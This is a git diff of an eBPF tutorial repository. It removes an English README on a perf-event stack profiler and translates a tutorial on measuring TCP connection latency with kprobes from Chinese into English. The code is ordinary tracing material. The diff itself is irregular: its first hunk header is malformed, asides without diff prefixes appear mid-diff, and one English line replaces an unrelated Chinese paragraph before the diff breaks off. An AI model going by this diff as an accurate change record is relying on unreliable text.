+0,0 @@ -# eBPF Tutorial by Example 12: Using eBPF Program Profile for Performance Analysis - -This tutorial will guide you on using libbpf and eBPF programs for performance analysis. We will leverage the perf mechanism in the kernel to learn how to capture the execution time of functions and view performance data. - -libbpf is a C library for interacting with eBPF. It provides the basic functionality for creating, loading, and using eBPF programs. In this tutorial, we will mainly use libbpf for development. Perf is a performance analysis tool in the Linux kernel that allows users to measure and analyze the performance of kernel and user space programs, as well as obtain corresponding call stacks. It collects performance data using hardware counters and software events in the kernel. - -## eBPF Tool: profile Performance Analysis Example - -The `profile` tool is implemented based on eBPF and utilizes the perf events in the Linux kernel for performance analysis. The `profile` tool periodically samples each processor to capture the execution of kernel and user space functions. It provides the following information for stack traces: - -- Address: memory address of the function call -- Symbol: function name -- File Name: name of the source code file -- Line Number: line number in the source code - -This information helps developers locate performance bottlenecks and optimize code. Furthermore, flame graphs can be generated based on this information for a more intuitive view of performance data. 
- -In this example, you can compile and run it with the libbpf library (using Ubuntu/Debian as an example): - -**NOTE:** To compile the `profile`, you first need to install `Cargo`, as shown in ["The Cargo Book"](https://rustwiki.org/en/cargo/getting-started/installation.html) - -```console -$ git submodule update --init --recursive -$ sudo apt install clang libelf1 libelf-dev zlib1g-dev -$ make -$ sudo ./profile -COMM: chronyd (pid=156) @ CPU 1 -Kernel: - 0 [] _raw_spin_lock_irqsave+0x16 - 1 [] remove_wait_queue+0x14 - 2 [] poll_freewait+0x3d - 3 [] do_select+0x7bf - 4 [] core_sys_select+0x182 - 5 [] __x64_sys_pselect6+0xea - 6 [] do_syscall_64+0x38 - 7 [] entry_SYSCALL_64_after_hwframe+0x61 -Userspace: - 0 [<00007fab187bfe09>] - 1 [<000000000ee6ae98>] - -COMM: profile (pid=9843) @ CPU 6 -No Kernel Stack -Userspace: - 0 [<0000556deb068ac8>] - 1 [<0000556dec34cad0>] -``` - -## Implementation Principle - -The `profile` tool consists of two parts: the eBPF program in kernel space and the `profile` symbol handling program in user space. The `profile` symbol handling program is responsible for loading the eBPF program and processing the data outputted by the eBPF program. - -### Kernel Space Part - -The implementation logic of the eBPF program in kernel space mainly relies on perf events to periodically sample the stack of the program, thereby capturing its execution flow. - -```c -// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause -/* Copyright (c) 2022 Meta Platforms, Inc. */ -#include "vmlinux.h" -#include -#include -#include - -#include "profile.h" - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -struct { - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 256 * 1024); -} events SEC(".maps"); - -SEC("perf_event") -int profile(void *ctx) -{ - int pid = bpf_get_current_pid_tgid() >> 32; - int cpu_id = bpf_get_smp_processor_id(); - struct stacktrace_event *event; - int cp; - - event = bpf_ringbuf_reserve(&events, sizeof(*event), 0); - if (!event) - return 1; - - event->pid = pid; - event->cpu_id = cpu_id; - - if (bpf_get_current_comm(event->comm, sizeof(event->comm))) - event->comm[0] = 0; - - event->kstack_sz = bpf_get_stack(ctx, event->kstack, sizeof(event->kstack), 0); - - event->ustack_sz = bpf_get_stack(ctx, event->ustack, sizeof(event->ustack), BPF_F_USER_STACK); - - bpf_ringbuf_submit(event, 0); - - return 0; -} -``` - -Next, we will focus on the key part of the kernel code. - -1. Define eBPF maps `events`: - -```c -struct { - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 256 * 1024); -} events SEC(".maps"); -``` - -Here, a eBPF maps of type `BPF_MAP_TYPE_RINGBUF` is defined. The Ring Buffer is a high-performance circular buffer used to transfer data between the kernel and user space. `max_entries` sets the maximum size of the Ring Buffer. - -2. Define `perf_event` eBPF program: - -```c -SEC("perf_event") -int profile(void *ctx) -``` - -Here, a eBPF program named `profile` is defined, which will be executed when a perf event is triggered. - -3. Get process ID and CPU ID: - -```c -int pid = bpf_get_current_pid_tgid() >> 32; -int cpu_id = bpf_get_smp_processor_id(); -``` - -The function `bpf_get_current_pid_tgid()` returns the PID and TID of the current process. By right shifting 32 bits, we get the PID. The function `bpf_get_smp_processor_id()` returns the ID of the current CPU. - -4. 
Reserve space in the Ring Buffer: - -```c -event = bpf_ringbuf_reserve(&events, sizeof(*event), 0); -if (!event) - return 1; -``` - -Use the `bpf_ringbuf_reserve()` function to reserve space in the Ring Buffer for storing the collected stack information. If the reservation fails, return an error. - -5. Get the current process name: - -```c - -if (bpf_get_current_comm(event->comm, sizeof(event->comm))) - event->comm[0] = 0; -``` - -Use the `bpf_get_current_comm()` function to get the current process name and store it in `event->comm`. - -6. Get kernel stack information: - -```c - -event->kstack_sz = bpf_get_stack(ctx, event->kstack, sizeof(event->kstack), 0); -``` - -Use the `bpf_get_stack()` function to get kernel stack information. Store the result in `event->kstack` and the size in `event->kstack_sz`. - -7. Get user space stack information: - -```c -event->ustack_sz = bpf_get_stack(ctx, event->ustack, sizeof(event->ustack), BPF_F_USER_STACK); -``` - -Using the `bpf_get_stack()` function with the `BPF_F_USER_STACK` flag retrieves information about the user space stack. Store the result in `event->ustack` and its size in `event->ustack_sz`. - -8. Submit the event to the Ring Buffer: - -```c - bpf_ringbuf_submit(event, 0); -``` - -Finally, use the `bpf_ringbuf_submit()` function to submit the event to the Ring Buffer for the user space program to read and process. - -This kernel mode eBPF program captures the program's execution flow by sampling the kernel stack and user space stack of the program periodically. These data are stored in the Ring Buffer for the user mode `profile` program to read. - -### User Mode Section - -This code is mainly responsible for setting up perf events for each online CPU and attaching eBPF programs: - -```c -static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid, - int cpu, int group_fd, unsigned long flags) -{ - int ret; - - ret = syscall(__NR_perf_event_open, hw_event, pid, cpu, group_fd, flags); - return ret; -} - -int main(){ - ... - for (cpu = 0; cpu < num_cpus; cpu++) { - /* skip offline/not present CPUs */ - if (cpu >= num_online_cpus || !online_mask[cpu]) - continue; - - /* Set up performance monitoring on a CPU/Core */ - pefd = perf_event_open(&attr, pid, cpu, -1, PERF_FLAG_FD_CLOEXEC); - if (pefd < 0) { - fprintf(stderr, "Fail to set up performance monitor on a CPU/Core\n"); - err = -1; - goto cleanup; - } - pefds[cpu] = pefd; - - /* Attach a BPF program on a CPU */ - links[cpu] = bpf_program__attach_perf_event(skel->progs.profile, pefd); - if (!links[cpu]) { - err = -1; - goto cleanup; - } - } - ... -} -``` - -The `perf_event_open` function is a wrapper for the perf_event_open system call. It takes a pointer to a perf_event_attr structure to specify the type and attributes of the perf event. The pid parameter is used to specify the process ID to monitor (-1 for monitoring all processes), and the cpu parameter is used to specify the CPU to monitor. The group_fd parameter is used to group perf events, and we use -1 here to indicate no grouping is needed. The flags parameter is used to set some flags, and we use PERF_FLAG_FD_CLOEXEC to ensure file descriptors are closed when executing exec series system calls. - -In the main function: - -```c -for (cpu = 0; cpu < num_cpus; cpu++) { - // ... -} -``` - -This loop sets up perf events and attaches eBPF programs for each online CPU. Firstly, it checks if the current CPU is online and skips if it's not. 
Then, it uses the perf_event_open() function to set up perf events for the current CPU and stores the returned file descriptor in the pefds array. Finally, it attaches the eBPF program to the perf event using the bpf_program__attach_perf_event() function. The links array is used to store the BPF links for each CPU so that they can be destroyed when the program ends.By doing so, user-mode programs set perf events for each online CPU and attach eBPF programs to these perf events to monitor all online CPUs in the system. - -The following two functions are used to display stack traces and handle events received from the ring buffer: - -```c -static void show_stack_trace(__u64 *stack, int stack_sz, pid_t pid) -{ - const struct blazesym_result *result; - const struct blazesym_csym *sym; - sym_src_cfg src; - int i, j; - - if (pid) { - src.src_type = SRC_T_PROCESS; - src.params.process.pid = pid; - } else { - src.src_type = SRC_T_KERNEL; - src.params.kernel.kallsyms = NULL; - src.params.kernel.kernel_image = NULL; - } - - result = blazesym_symbolize(symbolizer, &src, 1, (const uint64_t *)stack, stack_sz); - - for (i = 0; i < stack_sz; i++) { - if (!result || result->size <= i || !result->entries[i].size) { - printf(" %d [<%016llx>]\n", i, stack[i]); - continue; - } - - if (result->entries[i].size == 1) { - sym = &result->entries[i].syms[0]; - if (sym->path && sym->path[0]) { - printf(" %d [<%016llx>] %s+0x%llx %s:%ld\n", - i, stack[i], sym->symbol, - stack[i] - sym->start_address, - sym->path, sym->line_no); - } else { - printf(" %d [<%016llx>] %s+0x%llx\n", - i, stack[i], sym->symbol, - stack[i] - sym->start_address); - } - continue; - } - - printf(" %d [<%016llx>]\n", i, stack[i]); - for (j = 0; j < result->entries[i].size; j++) { - sym = &result->entries[i].syms[j]; - if (sym->path && sym->path[0]) { - printf(" %s+0x%llx %s:%ld\n", - sym->symbol, stack[i] - sym->start_address, - sym->path, sym->line_no); - } else { - printf(" %s+0x%llx\n", sym->symbol, - stack[i] - sym->start_address); - } - } - } - - blazesym_result_free(result); -} - -/* Receive events from the ring buffer. */ -static int event_handler(void *_ctx, void *data, size_t size) -{ - struct stacktrace_event *event = data; - - if (event->kstack_sz <= 0 && event->ustack_sz <= 0) - return 1; - - printf("COMM: %s (pid=%d) @ CPU %d\n", event->comm, event->pid, event->cpu_id); - - if (event->kstack_sz > 0) { - printf("Kernel:\n"); - show_stack_trace(event->kstack, event->kstack_sz / sizeof(__u64), 0); - } else { - printf("No Kernel Stack\n"); - } - - if (event->ustack_sz > 0) { - printf("Userspace:\n"); - show_stack_trace(event->ustack, event->ustack_sz / sizeof(__u64), event->pid); - } else { - printf("No Userspace Stack\n"); - } - - printf("\n"); - return 0; -} -``` - -The `show_stack_trace()` function is used to display the stack trace of the kernel or userspace. It takes a `stack` parameter, which is a pointer to the kernel or userspace stack, and a `stack_sz` parameter, which represents the size of the stack. The `pid` parameter represents the ID of the process to be displayed (set to 0 when displaying the kernel stack). In the function, the source of the stack (kernel or userspace) is determined based on the `pid` parameter, and then the `blazesym_symbolize()` function is called to resolve the addresses in the stack to symbol names and source code locations. Finally, the resolved results are traversed and the symbol names and source code location information are outputted. 
- -The `event_handler()` function is used to handle events received from the ring buffer. It takes a `data` parameter, which points to the data in the ring buffer, and a `size` parameter, which represents the size of the data. The function first converts the `data` pointer to a pointer of type `stacktrace_event`, and then checks the sizes of the kernel and userspace stacks. If the stacks are empty, it returns directly. Next, the function outputs the process name, process ID, and CPU ID information. Then it displays the stack traces of the kernel and userspace respectively. When calling the `show_stack_trace()` function, the addresses, sizes, and process ID of the kernel and userspace stacks are passed in separately. - -These two functions are part of the eBPF profiling tool, used to display and process stack trace information collected by eBPF programs, helping users understand program performance and bottlenecks. - -### Summary - -Through this introductory tutorial on eBPF, we have learned how to use eBPF programs for performance analysis. In this process, we explained in detail how to create eBPF programs, monitor process performance, and retrieve data from the ring buffer for analyzing stack traces. We also learned how to use the `perf_event_open()` function to set up performance monitoring and attach BPF programs to performance events. In this tutorial, we also demonstrated how to write eBPF programs to capture the kernel and userspace stack information of processes in order to analyze program performance bottlenecks. With this example, you can understand the powerful features of eBPF in performance analysis. - -If you want to learn more about eBPF knowledge and practices, please refer to the official documentation of eunomia-bpf: . You can also visit our tutorial code repository or website for more examples and complete tutorials. - -The next tutorial will further explore advanced features of eBPF. We will continue to share more content about eBPF development practices to help you better understand and master eBPF technology. We hope these contents will be helpful for your learning and practice on the eBPF development journey. - -> The original link of this article: diff --git a/src/13-tcpconnlat/README.md b/src/13-tcpconnlat/README.md index e069414..491199b 100644 --- a/src/13-tcpconnlat/README.md +++ b/src/13-tcpconnlat/README.md @@ -1,50 +1,50 @@ -# eBPF入门开发实践教程十三:统计 TCP 连接延时,并使用 libbpf 在用户态处理数据 +# eBPF Tutorial by Example 13: Statistics of TCP Connection Delay with libbpf -eBPF (Extended Berkeley Packet Filter) 是一项强大的网络和性能分析工具,被应用在 Linux 内核上。eBPF 允许开发者动态加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or changing the kernel source code. -本文是 eBPF 入门开发实践教程的第十三篇,主要介绍如何使用 eBPF 统计 TCP 连接延时,并使用 libbpf 在用户态处理数据。 +This article is the thirteenth installment of the eBPF Tutorial by Example, mainly about how to use eBPF to measure TCP connection latency and process data in user space using libbpf. 
-## 背景 +## Background -在进行后端开发时,不论使用何种编程语言,我们都常常需要调用 MySQL、Redis 等数据库,或执行一些 RPC 远程调用,或者调用其他的 RESTful API。这些调用的底层,通常都是基于 TCP 协议进行的。原因是 TCP 协议具有可靠连接、错误重传、拥塞控制等优点,因此在网络传输层协议中,TCP 的应用广泛程度超过了 UDP。然而,TCP 也有一些缺点,如建立连接的延时较长。因此,也出现了一些替代方案,例如 QUIC(Quick UDP Internet Connections,快速 UDP 网络连接)。 +When developing backends, regardless of the programming language used, we often need to call databases such as MySQL and Redis, perform RPC remote calls, or call other RESTful APIs. The underlying implementation of these calls is usually based on the TCP protocol. This is because the TCP protocol has advantages such as reliable connection, error retransmission, congestion control, etc., so TCP is more widely used in network transport layer protocols than UDP. However, TCP also has some drawbacks, such as longer connection establishment delay. Therefore, some alternative solutions have emerged, such as QUIC (Quick UDP Internet Connections). -分析 TCP 连接延时对网络性能分析、优化以及故障排查都非常有用。 +Analyzing TCP connection delay is very useful for network performance analysis, optimization, and troubleshooting. -## tcpconnlat 工具概述 +## Overview of tcpconnlat Tool -`tcpconnlat` 这个工具能够跟踪内核中执行活动 TCP 连接的函数(如通过 `connect()` 系统调用),并测量并显示连接延时,即从发送 SYN 到收到响应包的时间。 +The `tcpconnlat` tool can trace the functions in the kernel that perform active TCP connections (such as using the `connect()` system call), and measure and display the connection latency, i.e., the time from sending SYN to receiving the response packet. -### TCP 连接原理 +### TCP Connection Principle -TCP 连接的建立过程,常被称为“三次握手”(Three-way Handshake)。以下是整个过程的步骤: +The process of establishing a TCP connection is often referred to as the "three-way handshake". Here are the steps of the entire process: -1. 客户端向服务器发送 SYN 包:客户端通过 `connect()` 系统调用发出 SYN。这涉及到本地的系统调用以及软中断的 CPU 时间开销。 -2. SYN 包传送到服务器:这是一次网络传输,涉及到的时间取决于网络延迟。 -3. 服务器处理 SYN 包:服务器内核通过软中断接收包,然后将其放入半连接队列,并发送 SYN/ACK 响应。这主要涉及 CPU 时间开销。 -4. SYN/ACK 包传送到客户端:这是另一次网络传输。 -5. 客户端处理 SYN/ACK:客户端内核接收并处理 SYN/ACK 包,然后发送 ACK。这主要涉及软中断处理开销。 -6. ACK 包传送到服务器:这是第三次网络传输。 -7. 服务器接收 ACK:服务器内核接收并处理 ACK,然后将对应的连接从半连接队列移动到全连接队列。这涉及到一次软中断的 CPU 开销。 -8. 唤醒服务器端用户进程:被 `accept()` 系统调用阻塞的用户进程被唤醒,然后从全连接队列中取出来已经建立好的连接。这涉及一次上下文切换的CPU开销。 +1. Client sends SYN packet to the server: The client sends SYN through the `connect()` system call. This involves local system call and CPU time cost of software interrupts. +2. SYN packet is transmitted to the server: This is a network transmission that depends on network latency. +3. Server handles the SYN packet: The server kernel receives the packet through a software interrupt, then puts it into the half-connection queue (SYN queue) and sends a SYN/ACK response. This mainly involves CPU time cost. +4. SYN/ACK packet is transmitted to the client: This is another network transmission. +5. Client handles the SYN/ACK: The client kernel receives and handles the SYN/ACK packet, then sends ACK. This mainly involves software interrupt handling cost. +6. ACK packet is transmitted to the server: This is the third network transmission. +7. Server receives ACK: The server kernel receives and handles the ACK, then moves the corresponding connection from the half-connection queue to the full-connection queue. This involves CPU time cost of a software interrupt. +8. Wake up the server-side user process: The user process blocked by the `accept()` system call is awakened, and then the established connection is taken out of the full-connection queue. This involves CPU cost of a context switch. 
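As a point of comparison (an illustrative aside, not part of this patch): this latency can also be approximated from user space by timing a blocking `connect()` call, but only for a process you control, and with the local syscall overhead included in the measurement. A minimal sketch, using a placeholder documentation address:

```c
// Userspace-only baseline: time a blocking connect() with clock_gettime().
// Unlike the eBPF approach below, this sees only one process and cannot
// observe connections made by other programs on the host.
#include <arpa/inet.h>
#include <stdio.h>
#include <sys/socket.h>
#include <time.h>
#include <unistd.h>

int main(void)
{
    struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port = htons(80) };
    inet_pton(AF_INET, "192.0.2.1", &addr.sin_addr); /* placeholder address */

    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return 1;

    struct timespec t0, t1;
    clock_gettime(CLOCK_MONOTONIC, &t0);
    int err = connect(fd, (struct sockaddr *)&addr, sizeof(addr));
    clock_gettime(CLOCK_MONOTONIC, &t1);

    double ms = (t1.tv_sec - t0.tv_sec) * 1e3 + (t1.tv_nsec - t0.tv_nsec) / 1e6;
    printf("connect() %s after %.2f ms\n", err ? "failed" : "succeeded", ms);
    close(fd);
    return 0;
}
```

This visibility gap is exactly what the eBPF implementation described next closes: it observes every process on the host without instrumenting any of them.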
-完整的流程图如下所示: +The complete flowchart is shown below: ![tcpconnlat1](tcpconnlat1.png) -在客户端视角,在正常情况下一次TCP连接总的耗时也就就大约是一次网络RTT的耗时。但在某些情况下,可能会导致连接时的网络传输耗时上涨、CPU处理开销增加、甚至是连接失败。这种时候在发现延时过长之后,就可以结合其他信息进行分析。 +From the client's perspective, under normal circumstances, the total time for a TCP connection is approximately the time consumed by one network round-trip. However, in some cases, the network transmission time may rise, the CPU processing overhead may increase, or the connection may even fail. When a long delay is detected, it can be analyzed in conjunction with other information. -## tcpconnlat 的 eBPF 实现 +## eBPF Implementation of tcpconnlat -为了理解 TCP 的连接建立过程,我们需要理解 Linux 内核在处理 TCP 连接时所使用的两个队列: +To understand the process of establishing a TCP connection, we need to understand two queues used by the Linux kernel when handling TCP connections: -- 半连接队列(SYN 队列):存储那些正在进行三次握手操作的 TCP 连接,服务器收到 SYN 包后,会将该连接信息存储在此队列中。 -- 全连接队列(Accept 队列):存储已经完成三次握手,等待应用程序调用 `accept()` 函数的 TCP 连接。服务器在收到 ACK 包后,会创建一个新的连接并将其添加到此队列。 +- Half-connection queue (SYN queue): Stores TCP connections that are in the process of performing three-way handshake. After the server receives the SYN packet, it stores the connection information in this queue. +- Full-connection queue (Accept queue): Stores TCP connections that have completed three-way handshake and are waiting for the application to call the `accept()` function. After the server receives the ACK packet, it creates a new connection and adds it to this queue. -理解了这两个队列的用途,我们就可以开始探究 tcpconnlat 的具体实现。tcpconnlat 的实现可以分为内核态和用户态两个部分,其中包括了几个主要的跟踪点:`tcp_v4_connect`, `tcp_v6_connect` 和 `tcp_rcv_state_process`。 +With an understanding of the purpose of these two queues, we can begin to explore the specific implementation of tcpconnlat. The implementation of tcpconnlat can be divided into two parts: kernel space and user space, which include several main trace points: `tcp_v4_connect`, `tcp_v6_connect`, and `tcp_rcv_state_process`. -这些跟踪点主要位于内核中的 TCP/IP 网络栈。当执行相关的系统调用或内核函数时,这些跟踪点会被激活,从而触发 eBPF 程序的执行。这使我们能够捕获和测量 TCP 连接建立的整个过程。 +These trace points are mainly located in the TCP/IP network stack in the kernel. When executing the corresponding system call or kernel function, these trace points are activated, triggering the execution of eBPF programs. This allows us to capture and measure the entire process of establishing a TCP connection. -让我们先来看一下这些挂载点的源代码: +Let's first take a look at the source code of these hook points: ```c SEC("kprobe/tcp_v4_connect") @@ -56,23 +56,23 @@ int BPF_KPROBE(tcp_v4_connect, struct sock *sk) SEC("kprobe/tcp_v6_connect") int BPF_KPROBE(tcp_v6_connect, struct sock *sk) { - return trace_connect(sk); + return trace_connect(sk); } SEC("kprobe/tcp_rcv_state_process") int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk) { - return handle_tcp_rcv_state_process(ctx, sk); + return handle_tcp_rcv_state_process(ctx, sk); } ``` -这段代码展示了三个内核探针(kprobe)的定义。`tcp_v4_connect` 和 `tcp_v6_connect` 在对应的 IPv4 和 IPv6 连接被初始化时被触发,调用 `trace_connect()` 函数,而 `tcp_rcv_state_process` 在内核处理 TCP 连接状态变化时被触发,调用 `handle_tcp_rcv_state_process()` 函数。 +This code snippet shows the definition of three kernel probes (kprobe). `tcp_v4_connect` and `tcp_v6_connect` are triggered when the corresponding IPv4 and IPv6 connections are initialized, invoking the `trace_connect()` function. On the other hand, `tcp_rcv_state_process` is triggered when the TCP connection state changes in the kernel, calling the `handle_tcp_rcv_state_process()` function. 
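Before attaching these kprobes, it can be worth confirming that the target functions are traceable on the running kernel. A quick sanity check (an aside, not part of this patch; the tracefs path may be /sys/kernel/tracing on newer systems, and symbols provided by modules are suffixed with the module name):

```console
$ sudo grep -wE 'tcp_v4_connect|tcp_v6_connect|tcp_rcv_state_process' \
      /sys/kernel/debug/tracing/available_filter_functions
tcp_v4_connect
tcp_v6_connect
tcp_rcv_state_process
```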
-接下来的部分将分为两大块:一部分是对这些挂载点内核态部分的分析,我们将解读内核源代码来详细说明这些函数如何工作;另一部分是用户态的分析,将关注 eBPF 程序如何收集这些挂载点的数据,以及如何与用户态程序进行交互。 +The following section will be divided into two parts: one part analyzes the kernel part of these hook points, where we will delve into the kernel source code to explain how these functions work in detail. The other part analyzes the user part, focusing on how eBPF programs collect data from these hook points and interact with user-space programs. -### tcp_v4_connect 函数解析 +### Analysis of tcp_v4_connect function -`tcp_v4_connect`函数是Linux内核处理TCP的IPv4连接请求的主要方式。当用户态程序通过`socket`系统调用创建了一个套接字后,接着通过`connect`系统调用尝试连接到远程服务器,此时就会触发`tcp_v4_connect`函数。 +The `tcp_v4_connect` function is the main way that the Linux kernel handles TCP IPv4 connection requests. When a user-space program creates a socket through the `socket` system call and then attempts to connect to a remote server through the `connect` system call, the `tcp_v4_connect` function is triggered. ```c /* This will initiate an outgoing connection. */ @@ -122,7 +122,6 @@ int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len) ip_rt_put(rt); return -ENETUNREACH; } - if (!inet_opt || !inet_opt->opt.srr) daddr = fl4->daddr; @@ -205,38 +204,37 @@ int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len) return 0; failure: - /* - * This unhashes the socket and releases the local port, - * if necessary. - */ - tcp_set_state(sk, TCP_CLOSE); - inet_bhash2_reset_saddr(sk); - ip_rt_put(rt); - sk->sk_route_caps = 0; - inet->inet_dport = 0; - return err; + /* + * This unhashes the socket and releases the local port, + * if necessary. + */ + tcp_set_state(sk, TCP_CLOSE); + inet_bhash2_reset_saddr(sk); + ip_rt_put(rt); + sk->sk_route_caps = 0; + inet->inet_dport = 0; + return err; } EXPORT_SYMBOL(tcp_v4_connect); ``` -参考链接: +Reference link: -接下来,我们一步步分析这个函数: +Next, let's analyze this function step by step: -首先,这个函数接收三个参数:一个套接字指针`sk`,一个指向套接字地址结构的指针`uaddr`和地址的长度`addr_len`。 +First, this function takes three parameters: a socket pointer `sk`, a pointer to the socket address structure `uaddr`, and the length of the address `addr_len`. ```c int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len) ``` -函数一开始就进行了参数检查,确认地址长度正确,而且地址的协议族必须是IPv4。不满足这些条件会导致函数返回错误。 +The function starts by checking the parameters, making sure the address length is correct and the address family is IPv4. If these conditions are not met, the function returns an error. -接下来,函数获取目标地址,如果设置了源路由选项(这是一个高级的IP特性,通常不会被使用),那么它还会获取源路由的下一跳地址。 +Next, the function retrieves the destination address and, if a source routing option is set (an advanced IP feature that is typically not used), it also retrieves the next hop address for the source route. ```c nexthop = daddr = usin->sin_addr.s_addr; inet_opt = rcu_dereference_protected(inet->inet_opt, - lockdep_sock_is_held(sk)); + lockdep_sock_is_held(sk)); if (inet_opt && inet_opt->opt.srr) { if (!daddr) return -EINVAL; @@ -244,23 +242,23 @@ if (inet_opt && inet_opt->opt.srr) { } ``` -然后,使用这些信息来寻找一个路由到目标地址的路由项。如果不能找到路由项或者路由项指向一个多播或广播地址,函数返回错误。 +Then, using this information, the function looks for a route entry to the destination address. If a route entry cannot be found or the route entry points to a multicast or broadcast address, the function returns an error. -接下来,它更新了源地址,处理了一些TCP时间戳选项的状态,并设置了目标端口和地址。之后,它更新了一些其他的套接字和TCP选项,并设置了连接状态为`SYN-SENT`。 +Next, it updates the source address, handles the state of some TCP timestamp options, and sets the destination port and address. 
After that, it updates some other socket and TCP options and sets the connection state to `SYN-SENT`. -然后,这个函数使用`inet_hash_connect`函数尝试将套接字添加到已连接的套接字的散列表中。如果这步失败,它会恢复套接字的状态并返回错误。 +Then, the function tries to add the socket to the connected sockets hash table using the `inet_hash_connect` function. If this step fails, it restores the socket state and returns an error. -如果前面的步骤都成功了,接着,使用新的源和目标端口来更新路由项。如果这步失败,它会清理资源并返回错误。 +If all the previous steps succeed, it then updates the route entry with the new source and destination ports. If this step fails, it cleans up resources and returns an error. -接下来,它提交目标信息到套接字,并为之后的分段偏移选择一个安全的随机值。 +Next, it commits the destination information to the socket and selects a secure random value for the sequence offset for future segments. -然后,函数尝试使用TCP Fast Open(TFO)进行连接,如果不能使用TFO或者TFO尝试失败,它会使用普通的TCP三次握手进行连接。 +Then, the function tries to establish the connection using TCP Fast Open (TFO), and if TFO is not available or the TFO attempt fails, it falls back to the regular TCP three-way handshake for connection. -最后,如果上面的步骤都成功了,函数返回成功,否则,它会清理所有资源并返回错误。 +Finally, if all the above steps succeed, the function returns success; otherwise, it cleans up all resources and returns an error. -总的来说,`tcp_v4_connect`函数是一个处理TCP连接请求的复杂函数,它处理了很多情况,包括参数检查、路由查找、源地址选择、源路由、TCP选项处理、TCP Fast Open,等等。它的主要目标是尽可能安全和有效地建立TCP连接。 +In summary, the `tcp_v4_connect` function is a complex function that handles TCP connection requests. It handles many cases, including parameter checking, route lookup, source address selection, source routing, TCP option handling, TCP Fast Open, and more. Its main goal is to establish TCP connections as safely and efficiently as possible. -### 内核态代码 +### Kernel Code ```c // SPDX-License-Identifier: GPL-2.0 @@ -396,9 +394,9 @@ int BPF_PROG(fentry_tcp_rcv_state_process, struct sock *sk) char LICENSE[] SEC("license") = "GPL"; ``` -这个eBPF(Extended Berkeley Packet Filter)程序主要用来监控并收集TCP连接的建立时间,即从发起TCP连接请求(`connect`系统调用)到连接建立完成(SYN-ACK握手过程完成)的时间间隔。这对于监测网络延迟、服务性能分析等方面非常有用。 +This eBPF (Extended Berkeley Packet Filter) program is mainly used to monitor and collect the time it takes to establish TCP connections, i.e., the time interval from initiating a TCP connection request (connect system call) to the completion of the connection establishment (SYN-ACK handshake process). This is very useful for monitoring network latency, service performance analysis, and other aspects. -首先,定义了两个eBPF maps:`start`和`events`。`start`是一个哈希表,用于存储发起连接请求的进程信息和时间戳,而`events`是一个`PERF_EVENT_ARRAY`类型的map,用于将事件数据传输到用户态。 +First, two eBPF maps are defined: `start` and `events`. `start` is a hash table used to store the process information and timestamp of the initiating connection request, while `events` is a map of type `PERF_EVENT_ARRAY` used to transfer event data to user space. ```c struct { @@ -415,7 +413,7 @@ struct { } events SEC(".maps"); ``` -在`tcp_v4_connect`和`tcp_v6_connect`的kprobe处理函数`trace_connect`中,会记录下发起连接请求的进程信息(进程名、进程ID和当前时间戳),并以socket结构作为key,存储到`start`这个map中。 +In the kprobe handling functions `trace_connect` of `tcp_v4_connect` and `tcp_v6_connect`, the process information (process name, process ID, and current timestamp) of the initiating connection request is recorded and stored in the `start` map with the socket structure as the key. 
```c static int trace_connect(struct sock *sk) @@ -434,7 +432,7 @@ static int trace_connect(struct sock *sk) } ``` -当TCP状态机处理到SYN-ACK包,即连接建立的时候,会触发`tcp_rcv_state_process`的kprobe处理函数`handle_tcp_rcv_state_process`。在这个函数中,首先检查socket的状态是否为`SYN-SENT`,如果是,会从`start`这个map中查找socket对应的进程信息。然后计算出从发起连接到现在的时间间隔,将该时间间隔,进程信息,以及TCP连接的详细信息(源端口,目标端口,源IP,目标IP等)作为event,通过`bpf_perf_event_output`函数发送到用户态。 +When the TCP state machine processes the SYN-ACK packet, i.e., when the connection is established, the kprobe handling function `handle_tcp_rcv_state_process` of `tcp_rcv_state_process` is triggered. In this function, it first checks if the socket state is `SYN-SENT`. If it is, it looks up the process information for the socket in the `start` map. Then it calculates the time interval from the initiation of the connection to the present and sends this time interval, process information, and TCP connection details (source port, destination port, source IP, destination IP, etc.) as an event to user space using the `bpf_perf_event_output` function. ```c static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk) @@ -458,9 +456,7 @@ static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk) event.delta_us = delta / 1000U; if (targ_min_us && event.delta_us < targ_min_us) - goto - - cleanup; + goto cleanup; __builtin_memcpy(&event.comm, piddatap->comm, sizeof(event.comm)); event.ts_us = ts / 1000; @@ -486,36 +482,9 @@ cleanup: } ``` -理解这个程序的关键在于理解Linux内核的网络栈处理流程,以及eBPF程序的运行模式。Linux内核网络栈对TCP连接建立的处理过程是,首先调用`tcp_v4_connect`或`tcp_v6_connect`函数(根据IP版本不同)发起TCP连接,然后在收到SYN-ACK包时,通过`tcp_rcv_state_process`函数来处理。eBPF程序通过在这两个关键函数上设置kprobe,可以在关键时刻得到通知并执行相应的处理代码。 +This program uses a while loop to repeatedly poll the perf event buffer. If there is an error during polling (e.g., due to a signal interruption), an error message will be printed. This polling process continues until an exit flag `exiting` is received. -一些关键概念说明: - -- kprobe:Kernel Probe,是Linux内核中用于动态追踪内核行为的机制。可以在内核函数的入口和退出处设置断点,当断点被触发时,会执行与kprobe关联的eBPF程序。 -- map:是eBPF程序中的一种数据结构,用于在内核态和用户态之间共享数据。 -- socket:在Linux网络编程中,socket是一个抽象概念,表示一个网络连接的端点。内核中的`struct sock`结构就是对socket的实现。 - -### 用户态数据处理 - -用户态数据处理是使用`perf_buffer__poll`来接收并处理从内核发送到用户态的eBPF事件。`perf_buffer__poll`是libbpf库提供的一个便捷函数,用于轮询perf event buffer并处理接收到的数据。 - -首先,让我们详细看一下主轮询循环: - -```c - /* main: poll */ - while (!exiting) { - err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS); - if (err < 0 && err != -EINTR) { - 